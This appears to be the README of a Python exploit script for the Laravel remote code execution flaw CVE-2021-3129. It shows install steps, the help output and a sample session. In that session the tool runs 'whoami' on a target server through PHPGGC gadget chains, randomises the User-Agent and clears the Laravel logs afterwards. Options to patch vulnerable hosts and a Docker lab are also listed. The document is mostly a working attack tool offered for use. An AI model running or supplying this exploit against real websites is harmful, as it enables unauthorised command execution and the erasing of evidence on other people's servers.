The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.
This script allows you to write/execute commands on a website running Laravel <= v8.4.2, that has "APP_DEBUG" set to "true" in its ".env" file.
It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files.
$ git clone
$ cd CVE-2021-3129
$ pip install -r requirements.txt
$ python3 --help
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /\_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
[•] Using PHPGGC:
usage: [-h] [--host HOST] [--force] [--log LOG] [--ua] [--chain CHAIN] [--chains] [--php PHP] [--private-key PRIVATE_KEY]
Exploit CVE-2021-3129 - Laravel vulnerability exploit script
-h, --help show this help message and exit
--host HOST Host URL to use exploit on
--force Force exploit without checking if vulnerable
--log LOG Full path to laravel.log file (e.g. /var/www/html/storage/logs/laravel.log)
--ua Randomize User-Agent for requests
--chain CHAIN Select PHPGGC chain. Use "--chains" parameter to view all available chains.
--chains View available chains for the "--chain" parameter
--php PHP Path to PHP executable
--private-key PRIVATE_KEY
Private key for patched hosts
- env (Updates the .env file to set APP_DEBUG to false)
- index (Injects code into index.php which prevents access to "/_ignition/execute-solution")
- private (Same as the index option, but allows specific header to access "_ignition/execute-solution")
$ docker build -t laravel_vulnerable .
$ docker run -p 8000:8000 laravel_vulnerable
$ python3 --host=""
Laravel Debug Mode CVE script
[•] Made by:
[•] Using PHPGGC:
[@] Starting exploit on ""...
[@] Testing vulnerable URL
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Windows based machine.
[√] Laravel log found: "C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log".
[•] Laravel version found: "7.30.4".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: execute whoami
[@] Executing command "whoami"...
[@] Generating payloads...
[√] Generated 12 payloads.
[@] Trying chain laravel/rce1 [1/12]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[!] Failed execution of payload.
Error: "file_get_contents(phar://C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log): failed to open stream: internal corruption of phar &quot;C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log&quot; (truncated entry)".
[?] Do you want to try the next chain? [Y/N] : y
[@] Trying chain laravel/rce8 [6/12]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:
autorite nt\iusr
[@] Clearing logs...
[?] Do you want to try the next chain? [Y/N] : n
[?] Please enter a command to execute: clear_logs
[@] Clearing Laravel logs...
[√] Cleared Laravel logs!